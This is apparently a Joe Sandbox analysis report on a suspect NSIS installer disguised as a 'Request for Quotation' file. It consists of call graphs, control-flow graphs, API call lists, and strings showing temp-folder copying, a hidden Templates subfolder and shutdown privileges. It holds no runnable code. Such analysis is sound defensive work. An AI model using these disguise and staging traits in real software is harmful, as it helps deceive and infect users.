4097->4063 4097->4065 4098->4097 4100 406270 LoadLibraryA 4099->4100 4101 40627b GetProcAddress 4099->4101 4100->4101 4102 405d8b 4100->4102 4101->4102 4102->4082 4103 405c08 lstrcpyW 4102->4103 4104 405c31 4103->4104 4105 405c57 GetShortPathNameW 4103->4105 4128 405b56 GetFileAttributesW CreateFileW 4104->4128 4106 405c6c 4105->4106 4107 405d7e 4105->4107 4106->4107 4109 405c74 wsprintfA 4106->4109 4107->4082 4112 405f0c 18 API calls 4109->4112 4110 405c3b CloseHandle GetShortPathNameW 4110->4107 4111 405c4f 4110->4111 4111->4105 4111->4107 4113 405c9c 4112->4113 4129 405b56 GetFileAttributesW CreateFileW 4113->4129 4115 405ca9 4115->4107 4116 405cb8 GetFileSize GlobalAlloc 4115->4116 4117 405d77 CloseHandle 4116->4117 4118 405cda 4116->4118 4117->4107 4130 405bd9 ReadFile 4118->4130 4123 405cf9 lstrcpyA 4126 405d1b 4123->4126 4124 405d0d 4125 405abb 4 API calls 4124->4125 4125->4126 4127 405d52 SetFilePointer WriteFile GlobalFree 4126->4127 4127->4117 4128->4110 4129->4115 4131 405bf7 4130->4131 4131->4117 4132 405abb lstrlenA 4131->4132 4133 405afc lstrlenA 4132->4133 4134 405b04 4133->4134 4135 405ad5 lstrcmpiA 4133->4135 4134->4123 4134->4124 4135->4134 4136 405af3 CharNextA 4135->4136 4136->4133 5563 402224 5564 40223e 5563->5564 5565 40222b 5563->5565 5566 405f0c 18 API calls 5565->5566 5567 402238 5566->5567 5568 4056c6 MessageBoxIndirectW 5567->5568 5568->5564 5569 10001667 5570 1000152e 4 API calls 5569->5570 5573 1000167f 5570->5573 5571 100016c5 GlobalFree 5572 1000169a 5572->5571 5573->5571 5573->5572 5574 100016b1 VirtualFree 5573->5574 5574->5571 5575 402729 5576 402730 5575->5576 5577 4029c7 5575->5577 5578 402736 FindClose 5576->5578 5578->5577 5579 401cab 5580 402b1d 18 API calls 5579->5580 5581 401cb2 5580->5581 5582 402b1d 18 API calls 5581->5582 5583 401cba GetDlgItem 5582->5583 5584 4024e8 5583->5584 5585 4016af 5586 402b3a 18 API calls 5585->5586 5587 4016b5 GetFullPathNameW 5586->5587 5588 4016f1 5587->5588 5589 4016cf 5587->5589 5590 401706 GetShortPathNameW 5588->5590 5591 4029c7 5588->5591 5589->5588 5592 40622d 2 API calls 5589->5592 5590->5591 5593 4016e1 5592->5593 5593->5588 5595 405eea lstrcpynW 5593->5595 5595->5588 4320 402331 4321 402337 4320->4321 4322 402b3a 18 API calls 4321->4322 4323 402349 4322->4323 4324 402b3a 18 API calls 4323->4324 4325 402353 RegCreateKeyExW 4324->4325 4326 40237d 4325->4326 4328 402793 4325->4328 4327 402398 4326->4327 4329 402b3a 18 API calls 4326->4329 4330 402b1d 18 API calls 4327->4330 4333 4023a4 4327->4333 4332 40238e lstrlenW 4329->4332 4330->4333 4331 4023bf RegSetValueExW 4335 4023d5 RegCloseKey 4331->4335 4332->4327 4333->4331 4337 403062 4333->4337 4335->4328 4338 403072 SetFilePointer 4337->4338 4339 40308e 4337->4339 4338->4339 4352 40317d GetTickCount 4339->4352 4342 405bd9 ReadFile 4343 4030ae 4342->4343 4344 40317d 43 API calls 4343->4344 4348 403139 4343->4348 4345 4030c5 4344->4345 4346 40313f ReadFile 4345->4346 4345->4348 4349 4030d5 4345->4349 4346->4348 4348->4331 4349->4348 4350 405bd9 ReadFile 4349->4350 4351 403108 WriteFile 4349->4351 4350->4349 4351->4348 4351->4349 4353 4032e7 4352->4353 4354 4031ac 4352->4354 4355 402d1a 33 API calls 4353->4355 4365 40330f SetFilePointer 4354->4365 4361 403095 4355->4361 4357 4031b7 SetFilePointer 4363 4031dc 4357->4363 4361->4342 4361->4348 4362 403271 WriteFile 4362->4361 4362->4363 4363->4361 4363->4362 4364 4032c8 SetFilePointer 4363->4364 4366 4032f9 4363->4366 4369 406390 4363->4369 4376 402d1a 4363->4376 4364->4353 4365->4357 4367 405bd9 ReadFile 4366->4367 4368 40330c 4367->4368 4368->4363 4370 4063b5 4369->4370 4371 4063bd 4369->4371 4370->4363 4371->4370 4372 406444 GlobalFree 4371->4372 4373 40644d GlobalAlloc 4371->4373 4374 4064c4 GlobalAlloc 4371->4374 4375 4064bb GlobalFree 4371->4375 4372->4373 4373->4370 4373->4371 4374->4370 4374->4371 4375->4374 4377 402d43 4376->4377 4378 402d2b 4376->4378 4379 402d53 GetTickCount 4377->4379 4380 402d4b 4377->4380 4381 402d34 DestroyWindow 4378->4381 4382 402d3b 4378->4382 4379->4382 4384 402d61 4379->4384 4383 40628d 2 API calls 4380->4383 4381->4382 4382->4363 4383->4382 4385 402d96 CreateDialogParamW ShowWindow 4384->4385 4386 402d69 4384->4386 4385->4382 4386->4382 4391 402cfe 4386->4391 4388 402d77 wsprintfW 4389 405194 25 API calls 4388->4389 4390 402d94 4389->4390 4390->4382 4392 402d0d 4391->4392 4393 402d0f MulDiv 4391->4393 4392->4393 4393->4388 5603 4027b5 5604 402b3a 18 API calls 5603->5604 5605 4027c3 5604->5605 5606 4027d9 5605->5606 5608 402b3a 18 API calls 5605->5608 5607 405b31 2 API calls 5606->5607 5609 4027df 5607->5609 5608->5606 5629 405b56 GetFileAttributesW CreateFileW 5609->5629 5611 4027ec 5612 402895 5611->5612 5613 4027f8 GlobalAlloc 5611->5613 5616 4028b0 5612->5616 5617 40289d DeleteFileW 5612->5617 5614 402811 5613->5614 5615 40288c CloseHandle 5613->5615 5630 40330f SetFilePointer 5614->5630 5615->5612 5617->5616 5619 402817 5620 4032f9 ReadFile 5619->5620 5621 402820 GlobalAlloc 5620->5621 5622 402830 5621->5622 5623 402864 WriteFile GlobalFree 5621->5623 5625 403062 46 API calls 5622->5625 5624 403062 46 API calls 5623->5624 5626 402889 5624->5626 5628 40283d 5625->5628 5626->5615 5627 40285b GlobalFree 5627->5623 5628->5627 5629->5611 5630->5619 5631 4028b6 5632 402b1d 18 API calls 5631->5632 5633 4028bc 5632->5633 5634 4028f8 5633->5634 5635 4028df 5633->5635 5640 402793 5633->5640 5637 402902 5634->5637 5638 40290e 5634->5638 5636 4028e4 5635->5636 5643 4028f5 5635->5643 5645 405eea lstrcpynW 5636->5645 5641 402b1d 18 API calls 5637->5641 5639 405f0c 18 API calls 5638->5639 5639->5643 5641->5643 5643->5640 5646 405e31 wsprintfW 5643->5646 5645->5640 5646->5640 5647 4014b8 5648 4014be 5647->5648 5649 401389 2 API calls 5648->5649 5650 4014c6 5649->5650 4740 4015b9 4741 402b3a 18 API calls 4740->4741 4742 4015c0 4741->4742 4743 4059e0 4 API calls 4742->4743 4754 4015c9 4743->4754 4744 401614 4745 401646 4744->4745 4746 401619 4744->4746 4752 401423 25 API calls 4745->4752 4748 401423 25 API calls 4746->4748 4747 405962 CharNextW 4749 4015d7 CreateDirectoryW 4747->4749 4750 401620 4748->4750 4751 4015ed GetLastError 4749->4751 4749->4754 4758 405eea lstrcpynW 4750->4758 4751->4754 4755 4015fa GetFileAttributesW 4751->4755 4757 40163e 4752->4757 4754->4744 4754->4747 4755->4754 4756 40162d SetCurrentDirectoryW 4756->4757 4758->4756 5651 401939 5652 402b3a 18 API calls 5651->5652 5653 401940 lstrlenW 5652->5653 5654 4024e8 5653->5654 5655 40293b 5656 402b1d 18 API calls 5655->5656 5657 402941 5656->5657 5658 402974 5657->5658 5659 402793 5657->5659 5661 40294f 5657->5661 5658->5659 5660 405f0c 18 API calls 5658->5660 5660->5659 5661->5659 5663 405e31 wsprintfW 5661->5663 5663->5659 4972 40173f 4973 402b3a 18 API calls 4972->4973 4974 401746 4973->4974 4975 405b85 2 API calls 4974->4975 4976 40174d 4975->4976 4977 405b85 2 API calls 4976->4977 4977->4976 5664 40653f 5670 4063c3 5664->5670 5665 406d2e 5666 406444 GlobalFree 5667 40644d GlobalAlloc 5666->5667 5667->5665 5667->5670 5668 4064c4 GlobalAlloc 5668->5665 5668->5670 5669 4064bb GlobalFree 5669->5668 5670->5665 5670->5666 5670->5667 5670->5668 5670->5669

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 40335a-4033f0 #17 SetErrorMode OleInitialize call 406254 SHGetFileInfoW call 405eea GetCommandLineW call 405eea GetModuleHandleW 7 4033f2-4033f9 0->7 8 4033fa-40340c call 405962 CharNextW 0->8 7->8 11 4034da-4034e0 8->11 12 403411-403417 11->12 13 4034e6 11->13 14 403420-403426 12->14 15 403419-40341e 12->15 16 4034fa-403514 GetTempPathW call 403326 13->16 18 403428-40342c 14->18 19 40342d-403431 14->19 15->14 15->15 23 403516-403534 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40356c-403586 DeleteFileW call 402dbc 16->24 18->19 21 403437-40343d 19->21 22 4034cb-4034d6 call 405962 19->22 26 403457-40346e 21->26 27 40343f-403446 21->27 22->11 39 4034d8-4034d9 22->39 23->24 42 403536-403566 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->42 44 40361c-40362b call 4037c2 OleUninitialize 24->44 45 40358c-403592 24->45 28 403470-403486 26->28 29 40349c-4034b2 26->29 33 403448-40344b 27->33 34 40344d 27->34 28->29 35 403488-403490 28->35 29->22 37 4034b4-4034c9 29->37 33->26 33->34 34->26 40 403492-403495 35->40 41 403497 35->41 37->22 43 4034e8-4034f5 call 405eea 37->43 39->11 40->29 40->41 41->29 42->24 42->44 43->16 55 403631-403641 call 4056c6 ExitProcess 44->55 56 403727-40372d 44->56 48 403594-40359f call 405962 45->48 49 40360c-403613 call 4038b4 45->49 59 4035a1-4035b2 48->59 60 4035d6-4035e0 48->60 58 403618 49->58 62 4037aa-4037b2 56->62 63 40372f-40374c call 406254 * 3 56->63 58->44 64 4035b4-4035b6 59->64 67 4035e2-4035f0 call 405a3d 60->67 68 403647-403661 lstrcatW lstrcmpiW 60->68 65 4037b4 62->65 66 4037b8-4037bc ExitProcess 62->66 90 403796-4037a1 ExitWindowsEx 63->90 91 40374e-403750 63->91 72 4035d0-4035d4 64->72 73 4035b8-4035ce 64->73 65->66 67->44 81 4035f2-403608 call 405eea * 2 67->81 68->44 75 403663-403679 CreateDirectoryW SetCurrentDirectoryW 68->75 72->60 72->64 73->60 73->72 78 403686-4036af call 405eea 75->78 79 40367b-403681 call 405eea 75->79 89 4036b4-4036d0 call 405f0c DeleteFileW 78->89 79->78 81->49 99 403711-403719 89->99 100 4036d2-4036e2 CopyFileW 89->100 90->62 96 4037a3-4037a5 call 40140b 90->96 91->90 94 403752-403754 91->94 94->90 101 403756-403768 GetCurrentProcess 94->101 96->62 99->89 103 40371b-403722 call 405d84 99->103 100->99 102 4036e4-403704 call 405d84 call 405f0c call 405665 100->102 101->90 108 40376a-40378c 101->108 102->99 115 403706-40370d CloseHandle 102->115 103->44 108->90 115->99
                                                                                                                                  APIs
                                                                                                                                  • #17.COMCTL32 ref: 00403379
                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                    • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                    • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                    • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                  • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                    • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                  • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",00000000), ref: 004033DB
                                                                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",00000020), ref: 00403402
                                                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
                                                                                                                                  • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                                                                                  • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",00000000,?), ref: 0040364D
                                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",00000000,?), ref: 00403659
                                                                                                                                  • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                                                                                  • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\Request for Quotation New collaboration.exe,0041FE90,00000001), ref: 004036DA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe$C:\Users\user\Desktop$C:\Users\user\Desktop\Request for Quotation New collaboration.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                  • API String ID: 4107622049-513261896
                                                                                                                                  • Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                                  • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                                                  • Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                                  • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 116 404b10-404b5c GetDlgItem * 2 117 404b62-404bf6 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 116->117 118 404d7d-404d84 116->118 119 404c05-404c0c DeleteObject 117->119 120 404bf8-404c03 SendMessageW 117->120 121 404d86-404d96 118->121 122 404d98 118->122 124 404c0e-404c16 119->124 120->119 123 404d9b-404da4 121->123 122->123 125 404da6-404da9 123->125 126 404daf-404db5 123->126 127 404c18-404c1b 124->127 128 404c3f-404c43 124->128 125->126 129 404e93-404e9a 125->129 132 404dc4-404dcb 126->132 133 404db7-404dbe 126->133 130 404c20-404c3d call 405f0c SendMessageW * 2 127->130 131 404c1d 127->131 128->124 134 404c45-404c71 call 40412f * 2 128->134 135 404f0b-404f13 129->135 136 404e9c-404ea2 129->136 130->128 131->130 138 404e40-404e43 132->138 139 404dcd-404dd0 132->139 133->129 133->132 167 404c77-404c7d 134->167 168 404d3c-404d4f GetWindowLongW SetWindowLongW 134->168 144 404f15-404f1b SendMessageW 135->144 145 404f1d-404f24 135->145 141 4050f3-405105 call 404196 136->141 142 404ea8-404eb2 136->142 138->129 143 404e45-404e4f 138->143 147 404dd2-404dd9 139->147 148 404ddb-404df0 call 404a5e 139->148 142->141 150 404eb8-404ec7 SendMessageW 142->150 152 404e51-404e5d SendMessageW 143->152 153 404e5f-404e69 143->153 144->145 154 404f26-404f2d 145->154 155 404f58-404f5f 145->155 147->138 147->148 148->138 177 404df2-404e03 148->177 150->141 161 404ecd-404ede SendMessageW 150->161 152->153 153->129 163 404e6b-404e75 153->163 164 404f36-404f3d 154->164 165 404f2f-404f30 ImageList_Destroy 154->165 159 4050b5-4050bc 155->159 160 404f65-404f71 call 4011ef 155->160 159->141 172 4050be-4050c5 159->172 188 404f81-404f84 160->188 189 404f73-404f76 160->189 170 404ee0-404ee6 161->170 171 404ee8-404eea 161->171 173 404e86-404e90 163->173 174 404e77-404e84 163->174 175 404f46-404f52 164->175 176 404f3f-404f40 GlobalFree 164->176 165->164 179 404c80-404c87 167->179 183 404d55-404d59 168->183 170->171 181 404eeb-404f04 call 401299 SendMessageW 170->181 171->181 172->141 182 4050c7-4050f1 ShowWindow GetDlgItem ShowWindow 172->182 173->129 174->129 175->155 176->175 177->138 178 404e05-404e07 177->178 184 404e09-404e10 178->184 185 404e1a 178->185 186 404d1d-404d30 179->186 187 404c8d-404cb5 179->187 181->135 182->141 191 404d73-404d7b call 404164 183->191 192 404d5b-404d6e ShowWindow call 404164 183->192 194 404e12-404e14 184->194 195 404e16-404e18 184->195 198 404e1d-404e39 call 40117d 185->198 186->179 202 404d36-404d3a 186->202 196 404cb7-404ced SendMessageW 187->196 197 404cef-404cf1 187->197 203 404fc5-404fe9 call 4011ef 188->203 204 404f86-404f9f call 4012e2 call 401299 188->204 199 404f78 189->199 200 404f79-404f7c call 404ade 189->200 191->118 192->141 194->198 195->198 196->186 206 404cf3-404d02 SendMessageW 197->206 207 404d04-404d1a SendMessageW 197->207 198->138 199->200 200->188 202->168 202->183 218 40508b-40509f InvalidateRect 203->218 219 404fef 203->219 224 404fa1-404fa7 204->224 225 404faf-404fbe SendMessageW 204->225 206->186 207->186 218->159 220 4050a1-4050b0 call 404a31 call 404978 218->220 221 404ff2-404ffd 219->221 220->159 226 405073-405085 221->226 227 404fff-40500e 221->227 228 404fa9 224->228 229 404faa-404fad 224->229 225->203 226->218 226->221 231 405010-40501d 227->231 232 405021-405024 227->232 228->229 229->224 229->225 231->232 234 405026-405029 232->234 235 40502b-405034 232->235 236 405039-405071 SendMessageW * 2 234->236 235->236 237 405036 235->237 236->226 237->236
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                  • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                                  • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                  • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 483 405f0c-405f17 484 405f19-405f28 483->484 485 405f2a-405f40 483->485 484->485 486 405f46-405f53 485->486 487 406158-40615e 485->487 486->487 488 405f59-405f60 486->488 489 406164-40616f 487->489 490 405f65-405f72 487->490 488->487 492 406171-406175 call 405eea 489->492 493 40617a-40617b 489->493 490->489 491 405f78-405f84 490->491 494 406145 491->494 495 405f8a-405fc6 491->495 492->493 497 406153-406156 494->497 498 406147-406151 494->498 499 4060e6-4060ea 495->499 500 405fcc-405fd7 GetVersion 495->500 497->487 498->487 503 4060ec-4060f0 499->503 504 40611f-406123 499->504 501 405ff1 500->501 502 405fd9-405fdd 500->502 510 405ff8-405fff 501->510 502->501 507 405fdf-405fe3 502->507 508 406100-40610d call 405eea 503->508 509 4060f2-4060fe call 405e31 503->509 505 406132-406143 lstrlenW 504->505 506 406125-40612d call 405f0c 504->506 505->487 506->505 507->501 515 405fe5-405fe9 507->515 519 406112-40611b 508->519 509->519 511 406001-406003 510->511 512 406004-406006 510->512 511->512 517 406042-406045 512->517 518 406008-40602e call 405db7 512->518 515->501 520 405feb-405fef 515->520 524 406055-406058 517->524 525 406047-406053 GetSystemDirectoryW 517->525 531 406034-40603d call 405f0c 518->531 532 4060cd-4060d1 518->532 519->505 523 40611d 519->523 520->510 527 4060de-4060e4 call 40617e 523->527 529 4060c3-4060c5 524->529 530 40605a-406068 GetWindowsDirectoryW 524->530 528 4060c7-4060cb 525->528 527->505 528->527 528->532 529->528 533 40606a-406074 529->533 530->529 531->528 532->527 536 4060d3-4060d9 lstrcatW 532->536 538 406076-406079 533->538 539 40608e-4060a4 SHGetSpecialFolderLocation 533->539 536->527 538->539 543 40607b-406082 538->543 540 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 539->540 541 4060bf 539->541 540->528 540->541 541->529 544 40608a-40608c 543->544 544->528 544->539
                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
